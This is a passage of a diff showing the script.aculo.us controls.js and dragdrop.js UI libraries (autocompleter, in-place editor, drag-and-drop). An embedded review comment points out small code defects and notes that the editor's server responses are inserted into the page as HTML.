// new Ajax.Autocompleter('id','upd', '/url/', { tokens: ',' });
// will incrementally autocomplete with a comma as the token.
// Additionally, ',' in the above example can be replaced with
// a token array, e.g. { tokens: [',', '\n'] } which
// enables autocompletion on multiple tokens. This is most
// useful when one of the tokens is \n (a newline), as it
// allows smart autocompletion after linebreaks.
if(typeof Effect == 'undefined')
throw("controls.js requires including script.aculo.us' effects.js library");
var Autocompleter = {}
Autocompleter.Base = function() {};
Autocompleter.Base.prototype = {
baseInitialize: function(element, update, options) {
this.element = $(element);
this.update = $(update);
this.hasFocus = false;
this.changed = false;
this.active = false;
this.index = 0;
this.entryCount = 0;
if (this.setOptions)
this.setOptions(options);
else
this.options = options || {};
this.options.paramName = this.options.paramName || this.element.name;
this.options.tokens = this.options.tokens || [];
this.options.frequency = this.options.frequency || 0.4;
this.options.minChars = this.options.minChars || 1;
this.options.onShow = this.options.onShow ||
function(element, update){
if(!update.style.position || update.style.position=='absolute') {
update.style.position = 'absolute';
Position.clone(element, update, {setHeight: false, offsetTop: element.offsetHeight});
}
Effect.Appear(update,{duration:0.15});
};
this.options.onHide = this.options.onHide ||
function(element, update){ new Effect.Fade(update,{duration:0.15}) };
if (typeof(this.options.tokens) == 'string')
this.options.tokens = new Array(this.options.tokens);
this.observer = null;
this.element.setAttribute('autocomplete','off');
Element.hide(this.update);
Event.observe(this.element, "blur", this.onBlur.bindAsEventListener(this));
Event.observe(this.element, "keypress", this.onKeyPress.bindAsEventListener(this));
},
show: function() {
if(Element.getStyle(this.update, 'display')=='none') this.options.onShow(this.element, this.update);
if(!this.iefix &&
(navigator.appVersion.indexOf('MSIE')>0) &&
(navigator.userAgent.indexOf('Opera')<0) &&
(Element.getStyle(this.update, 'position')=='absolute')) {
new Insertion.After(this.update,
'<iframe id="' + this.update.id + '_iefix" '+
'style="display:none;position:absolute;filter:progid:DXImageTransform.Microsoft.Alpha(opacity=0);" ' +
'src="javascript:false;" frameborder="0" scrolling="no"></iframe>');
this.iefix = $(this.update.id+'_iefix');
}
if(this.iefix) setTimeout(this.fixIEOverlapping.bind(this), 50);
},
fixIEOverlapping: function() {
Position.clone(this.update, this.iefix, {setTop:(!this.update.style.height)});
this.iefix.style.zIndex = 1;
this.update.style.zIndex = 2;
Element.show(this.iefix);
},
hide: function() {
this.stopIndicator();
if(Element.getStyle(this.update, 'display')!='none') this.options.onHide(this.element, this.update);
if(this.iefix) Element.hide(this.iefix);
},
startIndicator: function() {
if(this.options.indicator) Element.show(this.options.indicator);
},
stopIndicator: function() {
if(this.options.indicator) Element.hide(this.options.indicator);
},
onKeyPress: function(event) {
if(this.active)
switch(event.keyCode) {
case Event.KEY_TAB:
case Event.KEY_RETURN:
this.selectEntry();
Event.stop(event);
case Event.KEY_ESC:
this.hide();
this.active = false;
Event.stop(event);
return;
case Event.KEY_LEFT:
case Event.KEY_RIGHT:
return;
case Event.KEY_UP:
this.markPrevious();
this.render();
if(navigator.appVersion.indexOf('AppleWebKit')>0) Event.stop(event);
return;
case Event.KEY_DOWN:
this.markNext();
this.render();
if(navigator.appVersion.indexOf('AppleWebKit')>0) Event.stop(event);
return;
}
else
if(event.keyCode==Event.KEY_TAB || event.keyCode==Event.KEY_RETURN ||
(navigator.appVersion.indexOf('AppleWebKit') > 0 && event.keyCode == 0)) return;
this.changed = true;
this.hasFocus = true;
if(this.observer) clearTimeout(this.observer);
this.observer =
setTimeout(this.onObserverEvent.bind(this), this.options.frequency*1000);
},
activate: function() {
this.changed = false;
this.hasFocus = true;
this.getUpdatedChoices();
},
onHover: function(event) {
var element = Event.findElement(event, 'LI');
if(this.index != element.autocompleteIndex)
{
this.index = element.autocompleteIndex;
this.render();
}
Event.stop(event);
},
onClick: function(event) {
var element = Event.findElement(event, 'LI');
this.index = element.autocompleteIndex;
this.selectEntry();
this.hide();
},
onBlur: function(event) {
// needed to make click events working
setTimeout(this.hide.bind(this), 250);
this.hasFocus = false;
this.active = false;
},
render: function() {
if(this.entryCount > 0) {
for (var i = 0; i < this.entryCount; i++)
this.index==i ?
Element.addClassName(this.getEntry(i),"selected") :
Element.removeClassName(this.getEntry(i),"selected");
if(this.hasFocus) {
this.show();
this.active = true;
}
} else {
this.active = false;
this.hide();
}
},
markPrevious: function() {
if(this.index > 0) this.index--
else this.index = this.entryCount-1;
this.getEntry(this.index).scrollIntoView(true);
},
markNext: function() {
if(this.index < this.entryCount-1) this.index++
else this.index = 0;
this.getEntry(this.index).scrollIntoView(false);
},
getEntry: function(index) {
return this.update.firstChild.childNodes[index];
},
getCurrentEntry: function() {
return this.getEntry(this.index);
},
selectEntry: function() {
this.active = false;
this.updateElement(this.getCurrentEntry());
},
updateElement: function(selectedElement) {
if (this.options.updateElement) {
this.options.updateElement(selectedElement);
return;
}
var value = '';
if (this.options.select) {
var nodes = document.getElementsByClassName(this.options.select, selectedElement) || [];
if(nodes.length>0) value = Element.collectTextNodes(nodes[0], this.options.select);
} else
value = Element.collectTextNodesIgnoreClass(selectedElement, 'informal');
var lastTokenPos = this.findLastToken();
if (lastTokenPos != -1) {
var newValue = this.element.value.substr(0, lastTokenPos + 1);
var whitespace = this.element.value.substr(lastTokenPos + 1).match(/^\s+/);
if (whitespace)
newValue += whitespace[0];
this.element.value = newValue + value;
} else {
this.element.value = value;
}
this.element.focus();
if (this.options.afterUpdateElement)
this.options.afterUpdateElement(this.element, selectedElement);
},
updateChoices: function(choices) {
if(!this.changed && this.hasFocus) {
this.update.innerHTML = choices;
Element.cleanWhitespace(this.update);
Element.cleanWhitespace(this.update.firstChild);
if(this.update.firstChild && this.update.firstChild.childNodes) {
this.entryCount =
this.update.firstChild.childNodes.length;
for (var i = 0; i < this.entryCount; i++) {
var entry = this.getEntry(i);
entry.autocompleteIndex = i;
this.addObservers(entry);
}
} else {
this.entryCount = 0;
}
this.stopIndicator();
this.index = 0;
this.render();
}
},
addObservers: function(element) {
Event.observe(element, "mouseover", this.onHover.bindAsEventListener(this));
Event.observe(element, "click", this.onClick.bindAsEventListener(this));
},
onObserverEvent: function() {
this.changed = false;
if(this.getToken().length>=this.options.minChars) {
this.startIndicator();
this.getUpdatedChoices();
} else {
this.active = false;
this.hide();
}
},
getToken: function() {
var tokenPos = this.findLastToken();
if (tokenPos != -1)
var ret = this.element.value.substr(tokenPos + 1).replace(/^\s+/,'').replace(/\s+$/,'');
else
var ret = this.element.value;
return /\n/.test(ret) ? '' : ret;
},
findLastToken: function() {
var lastTokenPos = -1;
for (var i=0; i<this.options.tokens.length; i++) {
var thisTokenPos = this.element.value.lastIndexOf(this.options.tokens[i]);
if (thisTokenPos > lastTokenPos)
lastTokenPos = thisTokenPos;
}
return lastTokenPos;
}
}
Ajax.Autocompleter = Class.create();
Object.extend(Object.extend(Ajax.Autocompleter.prototype, Autocompleter.Base.prototype), {
initialize: function(element, update, url, options) {
this.baseInitialize(element, update, options);
this.options.asynchronous = true;
this.options.onComplete = this.onComplete.bind(this);
this.options.defaultParams = this.options.parameters || null;
this.url = url;
},
getUpdatedChoices: function() {
entry = encodeURIComponent(this.options.paramName) + '=' +
encodeURIComponent(this.getToken());
this.options.parameters = this.options.callback ?
this.options.callback(this.element, entry) : entry;
if(this.options.defaultParams)
this.options.parameters += '&' + this.options.defaultParams;
new Ajax.Request(this.url, this.options);
},
onComplete: function(request) {
this.updateChoices(request.responseText);
}
});
// The local array autocompleter. Used when you'd prefer to
// inject an array of autocompletion options into the page, rather
// than sending out Ajax queries, which can be quite slow sometimes.
//
// The constructor takes four parameters. The first two are, as usual,
// the id of the monitored textbox, and id of the autocompletion menu.
// The third is the array you want to autocomplete from, and the fourth
// is the options block.
//
// Extra local autocompletion options:
// - choices - How many autocompletion choices to offer
//
// - partialSearch - If false, the autocompleter will match entered
// text only at the beginning of strings in the
// autocomplete array. Defaults to true, which will
// match text at the beginning of any *word* in the
// strings in the autocomplete array. If you want to
// search anywhere in the string, additionally set
// the option fullSearch to true (default: off).
//
// - fullSsearch - Search anywhere in autocomplete array strings.
//
// - partialChars - How many characters to enter before triggering
// a partial match (unlike minChars, which defines
// how many characters are required to do any match
// at all). Defaults to 2.
//
// - ignoreCase - Whether to ignore case when autocompleting.
// Defaults to true.
//
// It's possible to pass in a custom function as the 'selector'
// option, if you prefer to write your own autocompletion logic.
// In that case, the other options above will not apply unless
// you support them.
Autocompleter.Local = Class.create();
Autocompleter.Local.prototype = Object.extend(new Autocompleter.Base(), {
initialize: function(element, update, array, options) {
this.baseInitialize(element, update, options);
this.options.array = array;
},
getUpdatedChoices: function() {
this.updateChoices(this.options.selector(this));
},
setOptions: function(options) {
this.options = Object.extend({
choices: 10,
partialSearch: true,
partialChars: 2,
ignoreCase: true,
fullSearch: false,
selector: function(instance) {
var ret = []; // Beginning matches
var partial = []; // Inside matches
var entry = instance.getToken();
var count = 0;
for (var i = 0; i < instance.options.array.length &&
ret.length < instance.options.choices ; i++) {
var elem = instance.options.array[i];
var foundPos = instance.options.ignoreCase ?
elem.toLowerCase().indexOf(entry.toLowerCase()) :
elem.indexOf(entry);
while (foundPos != -1) {
if (foundPos == 0 && elem.length != entry.length) {
ret.push("<li><strong>" + elem.substr(0, entry.length) + "</strong>" +
elem.substr(entry.length) + "</li>");
break;
} else if (entry.length >= instance.options.partialChars &&
instance.options.partialSearch && foundPos != -1) {
if (instance.options.fullSearch || /\s/.test(elem.substr(foundPos-1,1))) {
partial.push("<li>" + elem.substr(0, foundPos) + "<strong>" +
elem.substr(foundPos, entry.length) + "</strong>" + elem.substr(
foundPos + entry.length) + "</li>");
break;
}
}
foundPos = instance.options.ignoreCase ?
elem.toLowerCase().indexOf(entry.toLowerCase(), foundPos + 1) :
elem.indexOf(entry, foundPos + 1);
}
}
if (partial.length)
ret = ret.concat(partial.slice(0, instance.options.choices - ret.length))
return "<ul>" + ret.join('') + "</ul>";
}
}, options || {});
}
});
// AJAX in-place editor
//
// see documentation on http://wiki.script.aculo.us/scriptaculous/show/Ajax.InPlaceEditor
// Use this if you notice weird scrolling problems on some browsers,
// the DOM might be a bit confused when this gets called so do this
// waits 1 ms (with setTimeout) until it does the activation
Field.scrollFreeActivate = function(field) {
setTimeout(function() {
Field.activate(field);
}, 1);
}
Ajax.InPlaceEditor = Class.create();
Ajax.InPlaceEditor.defaultHighlightColor = "#FFFF99";
Ajax.InPlaceEditor.prototype = {
initialize: function(element, url, options) {
this.url = url;
this.element = $(element);
this.options = Object.extend({
okButton: true,
okText: "ok",
cancelLink: true,
cancelText: "cancel",
savingText: "Saving...",
clickToEditText: "Click to edit",
okText: "ok",
rows: 1,
onComplete: function(transport, element) {
new Effect.Highlight(element, {startcolor: this.options.highlightcolor});
},
onFailure: function(transport) {
alert("Error communicating with the server: " + transport.responseText.stripTags());
},
callback: function(form) {
return Form.serialize(form);
},
handleLineBreaks: true,
loadingText: 'Loading...',
savingClassName: 'inplaceeditor-saving',
loadingClassName: 'inplaceeditor-loading',
formClassName: 'inplaceeditor-form',
highlightcolor: Ajax.InPlaceEditor.defaultHighlightColor,
highlightendcolor: "#FFFFFF",
externalControl: null,
submitOnBlur: false,
ajaxOptions: {},
evalScripts: false
}, options || {});
if(!this.options.formId && this.element.id) {
this.options.formId = this.element.id + "-inplaceeditor";
if ($(this.options.formId)) {
// there's already a form with that name, don't specify an id
this.options.formId = null;
}
}
if (this.options.externalControl) {
this.options.externalControl = $(this.options.externalControl);
}
this.originalBackground = Element.getStyle(this.element, 'background-color');
if (!this.originalBackground) {
this.originalBackground = "transparent";
}
this.element.title = this.options.clickToEditText;
this.onclickListener = this.enterEditMode.bindAsEventListener(this);
this.mouseoverListener = this.enterHover.bindAsEventListener(this);
this.mouseoutListener = this.leaveHover.bindAsEventListener(this);
Event.observe(this.element, 'click', this.onclickListener);
Event.observe(this.element, 'mouseover', this.mouseoverListener);
Event.observe(this.element, 'mouseout', this.mouseoutListener);
if (this.options.externalControl) {
Event.observe(this.options.externalControl, 'click', this.onclickListener);
Event.observe(this.options.externalControl, 'mouseover', this.mouseoverListener);
Event.observe(this.options.externalControl, 'mouseout', this.mouseoutListener);
}
},
enterEditMode: function(evt) {
if (this.saving) return;
if (this.editing) return;
this.editing = true;
this.onEnterEditMode();
if (this.options.externalControl) {
Element.hide(this.options.externalControl);
}
Element.hide(this.element);
this.createForm();
this.element.parentNode.insertBefore(this.form, this.element);
if (!this.options.loadTextURL) Field.scrollFreeActivate(this.editField);
// stop the event to avoid a page refresh in Safari
if (evt) {
Event.stop(evt);
}
return false;
},
createForm: function() {
this.form = document.createElement("form");
this.form.id = this.options.formId;
Element.addClassName(this.form, this.options.formClassName)
this.form.onsubmit = this.onSubmit.bind(this);
this.createEditField();
if (this.options.textarea) {
var br = document.createElement("br");
this.form.appendChild(br);
}
if (this.options.okButton) {
okButton = document.createElement("input");
okButton.type = "submit";
okButton.value = this.options.okText;
okButton.className = 'editor_ok_button';
this.form.appendChild(okButton);
}
if (this.options.cancelLink) {
cancelLink = document.createElement("a");
cancelLink.href = "#";
cancelLink.appendChild(document.createTextNode(this.options.cancelText));
cancelLink.onclick = this.onclickCancel.bind(this);
cancelLink.className = 'editor_cancel';
this.form.appendChild(cancelLink);
}
},
hasHTMLLineBreaks: function(string) {
if (!this.options.handleLineBreaks) return false;
return string.match(/<br/i) || string.match(/<p>/i);
},
convertHTMLLineBreaks: function(string) {
return string.replace(/<br>/gi, "\n").replace(/<br\/>/gi, "\n").replace(/<\/p>/gi, "\n").replace(/<p>/gi, "");
},
createEditField: function() {
var text;
if(this.options.loadTextURL) {
text = this.options.loadingText;
} else {
text = this.getText();
}
var obj = this;
if (this.options.rows == 1 && !this.hasHTMLLineBreaks(text)) {
this.options.textarea = false;
var textField = document.createElement("input");
textField.obj = this;
textField.type = "text";
textField.name = "value";
textField.value = text;
textField.style.backgroundColor = this.options.highlightcolor;
textField.className = 'editor_field';
var size = this.options.size || this.options.cols || 0;
if (size != 0) textField.size = size;
if (this.options.submitOnBlur)
textField.onblur = this.onSubmit.bind(this);
this.editField = textField;
} else {
this.options.textarea = true;
var textArea = document.createElement("textarea");
textArea.obj = this;
textArea.name = "value";
textArea.value = this.convertHTMLLineBreaks(text);
textArea.rows = this.options.rows;
textArea.cols = this.options.cols || 40;
textArea.className = 'editor_field';
if (this.options.submitOnBlur)
textArea.onblur = this.onSubmit.bind(this);
this.editField = textArea;
}
if(this.options.loadTextURL) {
this.loadExternalText();
}
this.form.appendChild(this.editField);
},
getText: function() {
return this.element.innerHTML;
},
loadExternalText: function() {
Element.addClassName(this.form, this.options.loadingClassName);
this.editField.disabled = true;
new Ajax.Request(
this.options.loadTextURL,
Object.extend({
asynchronous: true,
onComplete: this.onLoadedExternalText.bind(this)
}, this.options.ajaxOptions)
);
},
onLoadedExternalText: function(transport) {
Element.removeClassName(this.form, this.options.loadingClassName);
this.editField.disabled = false;
this.editField.value = transport.responseText.stripTags();
Field.scrollFreeActivate(this.editField);
},
onclickCancel: function() {
this.onComplete();
this.leaveEditMode();
return false;
},
onFailure: function(transport) {
this.options.onFailure(transport);
if (this.oldInnerHTML) {
this.element.innerHTML = this.oldInnerHTML;
this.oldInnerHTML = null;
}
return false;
},
onSubmit: function() {
// onLoading resets these so we need to save them away for the Ajax call
var form = this.form;
var value = this.editField.value;
// do this first, sometimes the ajax call returns before we get a chance to switch on Saving...
// which means this will actually switch on Saving... *after* we've left edit mode causing Saving...
// to be displayed indefinitely
this.onLoading();
if (this.options.evalScripts) {
new Ajax.Request(
this.url, Object.extend({
parameters: this.options.callback(form, value),
onComplete: this.onComplete.bind(this),
onFailure: this.onFailure.bind(this),
asynchronous:true,
evalScripts:true
}, this.options.ajaxOptions));
} else {
new Ajax.Updater(
{ success: this.element,
// don't update on failure (this could be an option)
failure: null },
this.url, Object.extend({
parameters: this.options.callback(form, value),
onComplete: this.onComplete.bind(this),
onFailure: this.onFailure.bind(this)
}, this.options.ajaxOptions));
}
// stop the event to avoid a page refresh in Safari
if (arguments.length > 1) {
Event.stop(arguments[0]);
}
return false;
},
onLoading: function() {
this.saving = true;
this.removeForm();
this.leaveHover();
this.showSaving();
},
showSaving: function() {
this.oldInnerHTML = this.element.innerHTML;
this.element.innerHTML = this.options.savingText;
Element.addClassName(this.element, this.options.savingClassName);
this.element.style.backgroundColor = this.originalBackground;
Element.show(this.element);
},
removeForm: function() {
if(this.form) {
if (this.form.parentNode) Element.remove(this.form);
this.form = null;
}
},
enterHover: function() {
if (this.saving) return;
this.element.style.backgroundColor = this.options.highlightcolor;
if (this.effect) {
this.effect.cancel();
}
Element.addClassName(this.element, this.options.hoverClassName)
},
leaveHover: function() {
if (this.options.backgroundColor) {
this.element.style.backgroundColor = this.oldBackground;
}
Element.removeClassName(this.element, this.options.hoverClassName)
if (this.saving) return;
this.effect = new Effect.Highlight(this.element, {
startcolor: this.options.highlightcolor,
endcolor: this.options.highlightendcolor,
restorecolor: this.originalBackground
});
},
leaveEditMode: function() {
Element.removeClassName(this.element, this.options.savingClassName);
this.removeForm();
this.leaveHover();
this.element.style.backgroundColor = this.originalBackground;
Element.show(this.element);
if (this.options.externalControl) {
Element.show(this.options.externalControl);
}
this.editing = false;
this.saving = false;
this.oldInnerHTML = null;
this.onLeaveEditMode();
},
onComplete: function(transport) {
this.leaveEditMode();
this.options.onComplete.bind(this)(transport, this.element);
},
onEnterEditMode: function() {},
onLeaveEditMode: function() {},
dispose: function() {
if (this.oldInnerHTML) {
this.element.innerHTML = this.oldInnerHTML;
}
this.leaveEditMode();
Event.stopObserving(this.element, 'click', this.onclickListener);
Event.stopObserving(this.element, 'mouseover', this.mouseoverListener);
Event.stopObserving(this.element, 'mouseout', this.mouseoutListener);
if (this.options.externalControl) {
Event.stopObserving(this.options.externalControl, 'click', this.onclickListener);
Event.stopObserving(this.options.externalControl, 'mouseover', this.mouseoverListener);
Event.stopObserving(this.options.externalControl, 'mouseout', this.mouseoutListener);
}
}
};
Ajax.InPlaceCollectionEditor = Class.create();
Object.extend(Ajax.InPlaceCollectionEditor.prototype, Ajax.InPlaceEditor.prototype);
Object.extend(Ajax.InPlaceCollectionEditor.prototype, {
createEditField: function() {
if (!this.cached_selectTag) {
var selectTag = document.createElement("select");
var collection = this.options.collection || [];
var optionTag;
collection.each(function(e,i) {
optionTag = document.createElement("option");
optionTag.value = (e instanceof Array) ? e[0] : e;
if(this.options.value==optionTag.value) optionTag.selected = true;
optionTag.appendChild(document.createTextNode((e instanceof Array) ? e[1] : e));
selectTag.appendChild(optionTag);
}.bind(this));
this.cached_selectTag = selectTag;
}
this.editField = this.cached_selectTag;
if(this.options.loadTextURL) this.loadExternalText();
this.form.appendChild(this.editField);
this.options.callback = function(form, value) {
return "value=" + encodeURIComponent(value);
}
}
});
// Delayed observer, like Form.Element.Observer,
// but waits for delay after last key input
// Ideal for live-search fields
Form.Element.DelayedObserver = Class.create();
Form.Element.DelayedObserver.prototype = {
initialize: function(element, delay, callback) {
this.delay = delay || 0.5;
this.element = $(element);
this.callback = callback;
this.timer = null;
this.lastValue = $F(this.element);
Event.observe(this.element,'keyup',this.delayedListener.bindAsEventListener(this));
},
delayedListener: function(event) {
if(this.lastValue == $F(this.element)) return;
if(this.timer) clearTimeout(this.timer);
this.timer = setTimeout(this.onTimerEvent.bind(this), this.delay * 1000);
this.lastValue = $F(this.element);
},
onTimerEvent: function() {
this.timer = null;
this.callback(this.element, $F(this.element));
}
};
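Review bot: `createForm` in the removed `Ajax.InPlaceEditor` assigns `okButton` and `cancelLink` without `var`, so both become implicit globals, and `leaveHover` restores `this.oldBackground`, which nothing in these lines ever sets (`initialize` stores `originalBackground`). The commit message says the tree is moving to /branches/PHPBeEF/ rather than being retired, so I would fix both in the branch copy instead of carrying them over, and drop the duplicated `okText: "ok"` default while there. One more thing to record next to the branch copy: when `evalScripts` is false, `onSubmit` passes the response to `Ajax.Updater` with `success: this.element`, which writes it into the page as markup, and `getText` later reads `this.element.innerHTML` back into the edit field, so the endpoint behind the editor must return HTML-encoded text.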

931
js/dragdrop.js vendored

@@ -1,931 +0,0 @@
// Copyright (c) 2005 Thomas Fuchs (http://script.aculo.us, http://mir.aculo.us)
// (c) 2005 Sammi Williams (http://www.oriontransfer.co.nz, sammi@oriontransfer.co.nz)
//
// See scriptaculous.js for full license.
/*--------------------------------------------------------------------------*/
if(typeof Effect == 'undefined')
throw("dragdrop.js requires including script.aculo.us' effects.js library");
var Droppables = {
drops: [],
remove: function(element) {
this.drops = this.drops.reject(function(d) { return d.element==$(element) });
},
add: function(element) {
element = $(element);
var options = Object.extend({
greedy: true,
hoverclass: null,
tree: false
}, arguments[1] || {});
// cache containers
if(options.containment) {
options._containers = [];
var containment = options.containment;
if((typeof containment == 'object') &&
(containment.constructor == Array)) {
containment.each( function(c) { options._containers.push($(c)) });
} else {
options._containers.push($(containment));
}
}
if(options.accept) options.accept = [options.accept].flatten();
Element.makePositioned(element); // fix IE
options.element = element;
this.drops.push(options);
},
findDeepestChild: function(drops) {
deepest = drops[0];
for (i = 1; i < drops.length; ++i)
if (Element.isParent(drops[i].element, deepest.element))
deepest = drops[i];
return deepest;
},
isContained: function(element, drop) {
var containmentNode;
if(drop.tree) {
containmentNode = element.treeNode;
} else {
containmentNode = element.parentNode;
}
return drop._containers.detect(function(c) { return containmentNode == c });
},
isAffected: function(point, element, drop) {
return (
(drop.element!=element) &&
((!drop._containers) ||
this.isContained(element, drop)) &&
((!drop.accept) ||
(Element.classNames(element).detect(
function(v) { return drop.accept.include(v) } ) )) &&
Position.within(drop.element, point[0], point[1]) );
},
deactivate: function(drop) {
if(drop.hoverclass)
Element.removeClassName(drop.element, drop.hoverclass);
this.last_active = null;
},
activate: function(drop) {
if(drop.hoverclass)
Element.addClassName(drop.element, drop.hoverclass);
this.last_active = drop;
},
show: function(point, element) {
if(!this.drops.length) return;
var affected = [];
if(this.last_active) this.deactivate(this.last_active);
this.drops.each( function(drop) {
if(Droppables.isAffected(point, element, drop))
affected.push(drop);
});
if(affected.length>0) {
drop = Droppables.findDeepestChild(affected);
Position.within(drop.element, point[0], point[1]);
if(drop.onHover)
drop.onHover(element, drop.element, Position.overlap(drop.overlap, drop.element));
Droppables.activate(drop);
}
},
fire: function(event, element) {
if(!this.last_active) return;
Position.prepare();
if (this.isAffected([Event.pointerX(event), Event.pointerY(event)], element, this.last_active))
if (this.last_active.onDrop)
this.last_active.onDrop(element, this.last_active.element, event);
},
reset: function() {
if(this.last_active)
this.deactivate(this.last_active);
}
}
var Draggables = {
drags: [],
observers: [],
register: function(draggable) {
if(this.drags.length == 0) {
this.eventMouseUp = this.endDrag.bindAsEventListener(this);
this.eventMouseMove = this.updateDrag.bindAsEventListener(this);
this.eventKeypress = this.keyPress.bindAsEventListener(this);
Event.observe(document, "mouseup", this.eventMouseUp);
Event.observe(document, "mousemove", this.eventMouseMove);
Event.observe(document, "keypress", this.eventKeypress);
}
this.drags.push(draggable);
},
unregister: function(draggable) {
this.drags = this.drags.reject(function(d) { return d==draggable });
if(this.drags.length == 0) {
Event.stopObserving(document, "mouseup", this.eventMouseUp);
Event.stopObserving(document, "mousemove", this.eventMouseMove);
Event.stopObserving(document, "keypress", this.eventKeypress);
}
},
activate: function(draggable) {
window.focus(); // allows keypress events if window isn't currently focused, fails for Safari
this.activeDraggable = draggable;
},
deactivate: function() {
this.activeDraggable = null;
},
updateDrag: function(event) {
if(!this.activeDraggable) return;
var pointer = [Event.pointerX(event), Event.pointerY(event)];
// Mozilla-based browsers fire successive mousemove events with
// the same coordinates, prevent needless redrawing (moz bug?)
if(this._lastPointer && (this._lastPointer.inspect() == pointer.inspect())) return;
this._lastPointer = pointer;
this.activeDraggable.updateDrag(event, pointer);
},
endDrag: function(event) {
if(!this.activeDraggable) return;
this._lastPointer = null;
this.activeDraggable.endDrag(event);
this.activeDraggable = null;
},
keyPress: function(event) {
if(this.activeDraggable)
this.activeDraggable.keyPress(event);
},
addObserver: function(observer) {
this.observers.push(observer);
this._cacheObserverCallbacks();
},
removeObserver: function(element) { // element instead of observer fixes mem leaks
this.observers = this.observers.reject( function(o) { return o.element==element });
this._cacheObserverCallbacks();
},
notify: function(eventName, draggable, event) { // 'onStart', 'onEnd', 'onDrag'
if(this[eventName+'Count'] > 0)
this.observers.each( function(o) {
if(o[eventName]) o[eventName](eventName, draggable, event);
});
},
_cacheObserverCallbacks: function() {
['onStart','onEnd','onDrag'].each( function(eventName) {
Draggables[eventName+'Count'] = Draggables.observers.select(
function(o) { return o[eventName]; }
).length;
});
}
}
/*--------------------------------------------------------------------------*/
var Draggable = Class.create();
Draggable._revertCache = {};
Draggable._dragging = {};
Draggable.prototype = {
initialize: function(element) {
var options = Object.extend({
handle: false,
starteffect: function(element) {
element._opacity = Element.getOpacity(element);
Draggable._dragging[element] = true;
new Effect.Opacity(element, {duration:0.2, from:element._opacity, to:0.7});
},
reverteffect: function(element, top_offset, left_offset) {
var dur = Math.sqrt(Math.abs(top_offset^2)+Math.abs(left_offset^2))*0.02;
Draggable._revertCache[element] =
new Effect.Move(element, { x: -left_offset, y: -top_offset, duration: dur,
queue: {scope:'_draggable', position:'end'}
});
},
endeffect: function(element) {
var toOpacity = typeof element._opacity == 'number' ? element._opacity : 1.0;
new Effect.Opacity(element, {duration:0.2, from:0.7, to:toOpacity,
queue: {scope:'_draggable', position:'end'},
afterFinish: function(){ Draggable._dragging[element] = false }
});
},
zindex: 1000,
revert: false,
scroll: false,
scrollSensitivity: 20,
scrollSpeed: 15,
snap: false // false, or xy or [x,y] or function(x,y){ return [x,y] }
}, arguments[1] || {});
this.element = $(element);
if(options.handle && (typeof options.handle == 'string')) {
var h = Element.childrenWithClassName(this.element, options.handle, true);
if(h.length>0) this.handle = h[0];
}
if(!this.handle) this.handle = $(options.handle);
if(!this.handle) this.handle = this.element;
if(options.scroll && !options.scroll.scrollTo && !options.scroll.outerHTML)
options.scroll = $(options.scroll);
Element.makePositioned(this.element); // fix IE
this.delta = this.currentDelta();
this.options = options;
this.dragging = false;
this.eventMouseDown = this.initDrag.bindAsEventListener(this);
Event.observe(this.handle, "mousedown", this.eventMouseDown);
Draggables.register(this);
},
destroy: function() {
Event.stopObserving(this.handle, "mousedown", this.eventMouseDown);
Draggables.unregister(this);
},
currentDelta: function() {
return([
parseInt(Element.getStyle(this.element,'left') || '0'),
parseInt(Element.getStyle(this.element,'top') || '0')]);
},
initDrag: function(event) {
if(typeof Draggable._dragging[this.element] != undefined &&
Draggable._dragging[this.element]) return;
if(Event.isLeftClick(event)) {
// abort on form elements, fixes a Firefox issue
var src = Event.element(event);
if(src.tagName && (
src.tagName=='INPUT' ||
src.tagName=='SELECT' ||
src.tagName=='OPTION' ||
src.tagName=='BUTTON' ||
src.tagName=='TEXTAREA')) return;
if(Draggable._revertCache[this.element]) {
Draggable._revertCache[this.element].cancel();
Draggable._revertCache[this.element] = null;
}
var pointer = [Event.pointerX(event), Event.pointerY(event)];
var pos = Position.cumulativeOffset(this.element);
this.offset = [0,1].map( function(i) { return (pointer[i] - pos[i]) });
Draggables.activate(this);
Event.stop(event);
}
},
startDrag: function(event) {
this.dragging = true;
if(this.options.zindex) {
this.originalZ = parseInt(Element.getStyle(this.element,'z-index') || 0);
this.element.style.zIndex = this.options.zindex;
}
if(this.options.ghosting) {
this._clone = this.element.cloneNode(true);
Position.absolutize(this.element);
this.element.parentNode.insertBefore(this._clone, this.element);
}
if(this.options.scroll) {
if (this.options.scroll == window) {
var where = this._getWindowScroll(this.options.scroll);
this.originalScrollLeft = where.left;
this.originalScrollTop = where.top;
} else {
this.originalScrollLeft = this.options.scroll.scrollLeft;
this.originalScrollTop = this.options.scroll.scrollTop;
}
}
Draggables.notify('onStart', this, event);
if(this.options.starteffect) this.options.starteffect(this.element);
},
updateDrag: function(event, pointer) {
if(!this.dragging) this.startDrag(event);
Position.prepare();
Droppables.show(pointer, this.element);
Draggables.notify('onDrag', this, event);
this.draw(pointer);
if(this.options.change) this.options.change(this);
if(this.options.scroll) {
this.stopScrolling();
var p;
if (this.options.scroll == window) {
with(this._getWindowScroll(this.options.scroll)) { p = [ left, top, left+width, top+height ]; }
} else {
p = Position.page(this.options.scroll);
p[0] += this.options.scroll.scrollLeft;
p[1] += this.options.scroll.scrollTop;
p.push(p[0]+this.options.scroll.offsetWidth);
p.push(p[1]+this.options.scroll.offsetHeight);
}
var speed = [0,0];
if(pointer[0] < (p[0]+this.options.scrollSensitivity)) speed[0] = pointer[0]-(p[0]+this.options.scrollSensitivity);
if(pointer[1] < (p[1]+this.options.scrollSensitivity)) speed[1] = pointer[1]-(p[1]+this.options.scrollSensitivity);
if(pointer[0] > (p[2]-this.options.scrollSensitivity)) speed[0] = pointer[0]-(p[2]-this.options.scrollSensitivity);
if(pointer[1] > (p[3]-this.options.scrollSensitivity)) speed[1] = pointer[1]-(p[3]-this.options.scrollSensitivity);
this.startScrolling(speed);
}
// fix AppleWebKit rendering
if(navigator.appVersion.indexOf('AppleWebKit')>0) window.scrollBy(0,0);
Event.stop(event);
},
finishDrag: function(event, success) {
this.dragging = false;
if(this.options.ghosting) {
Position.relativize(this.element);
Element.remove(this._clone);
this._clone = null;
}
if(success) Droppables.fire(event, this.element);
Draggables.notify('onEnd', this, event);
var revert = this.options.revert;
if(revert && typeof revert == 'function') revert = revert(this.element);
var d = this.currentDelta();
if(revert && this.options.reverteffect) {
this.options.reverteffect(this.element,
d[1]-this.delta[1], d[0]-this.delta[0]);
} else {
this.delta = d;
}
if(this.options.zindex)
this.element.style.zIndex = this.originalZ;
if(this.options.endeffect)
this.options.endeffect(this.element);
Draggables.deactivate(this);
Droppables.reset();
},
keyPress: function(event) {
if(event.keyCode!=Event.KEY_ESC) return;
this.finishDrag(event, false);
Event.stop(event);
},
